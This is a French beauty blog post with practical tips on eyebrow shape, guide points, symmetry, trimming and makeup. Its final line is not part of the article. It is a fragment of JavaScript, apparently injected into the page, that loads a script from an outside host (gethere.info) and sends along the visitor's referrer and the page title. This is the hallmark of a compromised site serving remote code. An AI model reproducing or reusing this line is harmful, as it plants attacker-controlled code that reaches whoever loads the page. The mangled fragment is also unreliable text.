News

Trucs pour des sourcils en beauté

Rédigé par Elissa Catégorie: Blogue

La pose d’extensions de cils est certes l’une des meilleurs façons d’ouvrir le regard et de révéler encore plus la beauté des femmes, mais il ne faudrait pas oublier les sourcils! Ces derniers, en plus de participer à la protection de nos yeux d’agresseurs potentiels comme la sueur, jouent un rôle primordial dans la structure et l’expression de notre visage! Pour optimiser votre regard (et celui de vos clientes!) en ayant des sourcils impeccables, nous vous présentons quelques petits trucs pouvant vous aider!

LA FORME DES SOURCILS

Les sourcils doivent avant tout s’harmoniser avec la forme de votre visage. Par exemple, si votre mâchoire est ronde, vos sourcils devront avoir une forme plus arrondie; si votre mâchoire est plutôt carrée, alors vous opterez pour des sourcils plus angulaires.

ÉTABLIR LES GUIDES

Pour chacune des ces étapes, n’hésitez pas à vous munir d’un bâtonnet ou autre crayon pouvant vous aider à avoir des lignes de direction bien droites. Faites une marque à chacun des endroits à l’aide de votre crayon à sourcils.

Le début : pour déterminer l’endroit précis où votre sourcil devrait commencer, alignez l’aile de votre nez avec le coin interne de l’œil et faites une marque avec votre crayon à sourcils.

L’arc : il doit quant à lui être aligné avec le coin extérieur de votre nez en passant par le coin externe de la pupille.

La fin : pour déterminer où votre sourcil doit s’arrêter, alignez le coin externe du nez avec le coin externe de votre oeil.

La forme des sourcils donne un air différent au visage : les sourcils plus arrondis auront tendance à adoucir le visage tandis que les sourcils en accent circonflexe rajeunnissent et donnent un air plus vivant. Si les sourcils sont trop longs ou tombants, ils auront tendant à vieillir les traits du visage.

LA SYMÉTRIE

Les artistes-maquilleurs s’entendent pour dire qu’il ne faut pas absolument tout faire pour avoir des sourcils identiques! Bien souvent, ceci se traduirait par des sourcils beaucoup plus minces et présentant par conséquent beaucoup moins de caractère. Cependant, afin de vous aider à conserver le plus de symétrie possible sans trop épiler, il est recommandé de retirer les poils superflus un à un, d’un côté puis de l’autre (comme lors de la pose d’extensions de cils) et de procéder à toute l’épilation des sourcils de cette façon, en prenant du recul pour observer le résultat à plusieurs reprises.

TAILLER LES SOURCILS

Plusieurs oublient que bien souvent, une pince à épiler n’est pas suffisante pour l’obtention de beaux sourcils, surtout dans le cas des sourcils longs! À l’aide d’une brosse à sourcils, brossez vos sourcils vers le haut puis taillez-les à l’aide de petits ciseaux droits. Concentrez-vous sur les poils dépassant la ligne naturelle des sourcils, sans jamais couper au-dessus de l’arc.

MAQUILLER LES SOURCILS

Afin de créer une texture et un look des plus naturels, on recommande souvent l’utilisation de deux produits différents, comme par exemple une poudre à sourcils et un crayon à sourcils, ou même un gel. Pour le maquillage, on choisira une teinte se rapprochant de la couleur naturelle des sourcils, mais en optant pour la tonalité la plus pâle afin de ne pas donner au visage un air trop sévère.

EN CONCLUSION

Trop souvent, les femmes négligent l’importance du rôle que jouent les sourcils dans leur apparence et n’y consacrent que très peu de temps. Pourtant, des sourcils bien définis et bien entretenus font toute la différence tant au niveau de l’intensité du regard que de l’équilibre du visage! En quelques minutes seulement, votre regard sera sublimé et vos sourcils complèteront à merveille vos extensions de cils!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;